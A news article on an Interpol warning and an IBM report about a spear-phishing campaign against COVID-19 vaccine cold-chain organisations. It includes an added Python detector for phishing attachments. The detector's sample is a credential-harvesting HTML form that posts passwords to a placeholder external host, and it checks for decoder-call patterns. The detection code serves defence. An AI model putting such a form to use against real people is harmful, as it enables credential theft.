Hard on the heels of an Interpol warning this week that criminals are targeting COVID-19 vaccine supply chains comes an IBM report that the distribution network for the now-valuable serum is already under threat.
On Thursday, Interpol, the international police co-operative, issued an Orange Notice of potential criminal activity, including the falsification, theft and illegal advertising of COVID-19 and flu vaccines. With COVID vaccines about to get final approval from national health authorities and distribution expected to begin within weeks, there is tremendous value in what is hoped will be a serum that will snuff out the pandemic.
“As governments are preparing to roll out vaccines, criminal organizations are planning to infiltrate or disrupt supply chains,” Interpol secretary general Jürgen Stock said in a release. Some threat actors are already advertising fake vaccines, the statement added. As international travel gradually resumes, the production and sale of fake virus testing kits are also likely, it said. “It is essential that law enforcement is as prepared as possible for what will be an onslaught of all types of criminal activity linked to the COVID-19 vaccine, which is why Interpol has issued this global warning.”
While the Interpol statement wasn’t specific, criminals might calculate that the vaccine could be sold in less developed countries, where it won’t be distributed as quickly as in Western nations that have already paid tens of millions in advance for doses. Or they might judge that companies in the distribution network would be highly likely to pay data-theft blackmail or ransomware demands to protect their reputations and keep supplies shipping. Nation-states may want the intellectual property to buttress their own vaccine production efforts.
The Interpol statement didn’t give a specific example of a threat, but this morning IBM Security’s X-Force threat intelligence service said one campaign has been under way since September, aimed at a very narrow part of the vaccine distribution chain: the network that makes specialized cold storage equipment.
“The COVID-19 phishing campaign spanned across six countries and targeted organizations likely associated with Gavi, The Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program,” the report says. “While firm attribution could not be established for this campaign, the precision targeting of executives and key global organizations holds the potential hallmarks of nation-state tradecraft.”
According to IBM, someone pretending to be a business executive from Haier Biomedical, a qualified Chinese-based supplier for the CCEOP program, sent spear-phishing emails to organizations believed to be providers of material support to meet transportation needs within the COVID-19 cold chain.
The targets included the European Commission’s Directorate-General for Taxation and Customs Union and organizations within the energy, manufacturing, website creation and software, and internet security solutions sectors. Impacted countries include Germany, Italy, South Korea, Czech Republic, greater Europe and Taiwan.
It’s highly likely that the adversary strategically chose to impersonate Haier Biomedical because it’s purported to be the world’s only complete cold chain provider, the report said. The messages were requests for quotations (RFQ) related to the CCEOP program, but they carried malicious HTML attachments that open locally and prompt recipients to enter their credentials to view the file. Because the credential prompt is rendered from the attachment itself, the attackers avoid hosting phishing pages online, where they could be discovered and taken down by security research teams and law enforcement.
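Detection logic of the kind a mail gateway could apply to such attachments, as an added example that is not taken from the IBM report: it parses an HTML attachment for a locally rendered credential form that posts off-domain, plus a decoder call that often accompanies such files. The sample attachment and the sender domain are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of an HTML attachment that shows a sign-in prompt locally
# and posts the entered credentials to an external host (placeholder domain).
SAMPLE_ATTACHMENT = """
<html><body>
<p>Please sign in to view the RFQ document.</p>
<form method="post" action="https://collector.example.invalid/submit">
  <input type="email" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Open">
</form>
<script>var s = atob("ZXhhbXBsZQ==");</script>
</body></html>
"""


class _FormScanner(HTMLParser):
    """Collect form targets, password fields and script tags from the markup."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self.scripts += 1


def scan_html_attachment(html, sender_domain):
    """Return indicator names found in an HTML attachment (empty list if clean)."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    if scanner.password_inputs:
        findings.append("password_input")
    # A form in a file from sender X that submits to some other host is suspicious.
    for action in scanner.form_actions:
        host = urlparse(action).hostname or ""
        if host and not host.endswith(sender_domain):
            findings.append("form_posts_to_external_host")
            break
    # Inline decoder calls (atob/unescape/fromCharCode) hint at an obfuscated page.
    if scanner.scripts and re.search(r"\b(atob|unescape|fromCharCode)\s*\(", html):
        findings.append("decoder_script")
    return findings
```

A gateway would quarantine or flag a message whose attachment returns a password field together with either of the other two indicators.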
IBM says it isn’t clear whether any of the attacks were successful. It suspects the goal was to harvest credentials, possibly to gain future unauthorized access to corporate networks and sensitive information relating to COVID-19 vaccine distribution. Moving laterally through those networks and remaining there undetected would allow the attackers to conduct cyber espionage and collect confidential information from victim environments for future operations.
The precision targeting leads IBM to suspect a country was behind this campaign. Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets, it argues.
IBM said organizations in the vaccine supply chain should:
- Create and test incident response plans to strengthen your organization’s preparedness and readiness to respond in the event of an attack;
- Share threat intelligence;
- Assess your third-party ecosystem and the potential risks introduced by third-party partners. Confirm you have robust monitoring, access controls and security standards in place that third-party partners must abide by;
- Apply a zero-trust approach to your security strategy to manage privileged data access;
- Use Multifactor Authentication (MFA) across your organization as protection in case a threat actor steals passwords;
- Conduct regular email security training so employees remain alert to phishing tactics and are familiar with email security best practices;
- Use endpoint protection and response tools to more readily detect and prevent threats from spreading across the organization.